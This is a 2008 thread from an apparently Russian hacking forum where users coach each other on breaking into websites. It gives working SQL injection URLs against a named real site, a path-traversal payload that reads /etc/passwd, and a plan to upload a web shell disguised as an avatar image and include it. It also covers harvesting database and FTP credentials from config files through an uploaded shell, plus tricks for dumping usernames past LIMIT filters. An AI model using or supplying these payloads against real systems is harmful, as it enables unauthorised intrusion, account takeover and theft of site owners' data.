29.08.2008, 11:15
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами:
9550090
Репутация:
137
|
|
Сообщение от softrix
Залил шелл, но все папки и файлы кромер upload read-only, chmod не меняет права доступа.
Т.е. все файлы читать можно, но вот переписать, удалить или перезалить шел в другую папку не выходит.
Можно ли как-то снять защиту от записи на файлах?
узнай пароль от мускула .. попробуй подключится через фтп, если получится будут все папки доступны на запись
|
|
|
29.08.2008, 12:49
|
|
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами:
9395645
Репутация:
7
|
|
Сообщение от nicusor
узнай пароль от мускула .. попробуй подключится через фтп, если получится будут все папки доступны на запись
Хм, а как через мускул, можно пароль к фтп узнать ?
|
|
|
|
29.08.2008, 16:22
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами:
9550090
Репутация:
137
|
|
Сообщение от softrix
Хм, а как через мускул, можно пароль к фтп узнать ?
не через мускул, а через шелл который ты уже залил, читаешь файлы пхп смотришь конфиги для мускула. может быть тебе повезёт и пароль подойдёт к фтп.
|
|
|
|
29.08.2008, 14:07
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами:
9574565
Репутация:
712
|
|
Помогите плизз:
Код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*
С SQL-Inj мало работал( |
|
|
|
29.08.2008, 16:02
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от geforse
Помогите плизз:
Код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*
С SQL-Inj мало работал(
Код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=2095'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat(version(),char(58),user()))),11,12--+
2. Постить в тему с SQL инъекциями, то что ты запостил - не следовало, это не SQL инъекция - это издевательство, да и тема та не для вопросов (ну за это ты уже словил минус).
3. Прочитай хотя бы одну статью про SQL инъекции и не смеши людей.
|
|
|
|
29.08.2008, 16:39
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Сообщение от geforse
Помогите плизз:
Код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*
С SQL-Inj мало работал( Немного покопался я....
PHP код:
http://www.freedancer.ru/?module=messages&page=comments&messageid=-2095'+union+select+1,2,3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),11,12+from+cms_site_comments/*
если пойти дальше, можно найти читалку файлов...
PHP код:
http://www.freedancer.ru/?module=../../../../../../../../etc/passwd%00&cmd=list&dt=2
как видно magic_quotes_gpc = Off, что очень радует!
Далее регаемся, заливаем картинку с телом шелла в автару, путь будет примерно такой:
/home/www/stussy/freedancer/cache/avatars/image.jpg
С помощью читалки ищем дырку в каком нить скрипте, где будет возможен инклуд и инклудим сам шелл....
вот и все =)
|
|
|
|
29.08.2008, 18:55
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
такая фигня. взломал сайт, залил туда шелл (мадшелл с99). а он не показывает некоторые файлы =/
выполнял комманду ls -la - показывает все файлы (r57 показывает все)
с чем это может быть связано?
|
|
|
|
30.08.2008, 19:49
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Недавно при проведении скуль-инъекции возникла такая проблема - например, когда делаешь следующий запрос
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users/*
Скрипт выдает рандомное имя юзера из таблы, но стоит начать использовать лимит -
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+0,1/* или
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+1,1/*
То облом - скрипт ничего не выдает  И так со всеми таблицами, что можно в таком случае сделать ? |
|
|
|
31.08.2008, 02:06
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами:
9367310
Репутация:
52
|
|
Сообщение от 0nep@t0p
2 jokester
Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом
Линк кинул в пм
попробуй в запрос дописать +where+1=1, т.е. он будет примерно таким : www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+where+1=1+l imit+1,1/*
|
|
|
|
30.08.2008, 19:58
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
0nep@t0p
limit+1+offset+1
Видел как то фильтрацию "," точнее не фильтрацию, конечно , но неадекватную реакцию на неё именно в лимите 
Если нет, кинь линк в ПМ посмотрим
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
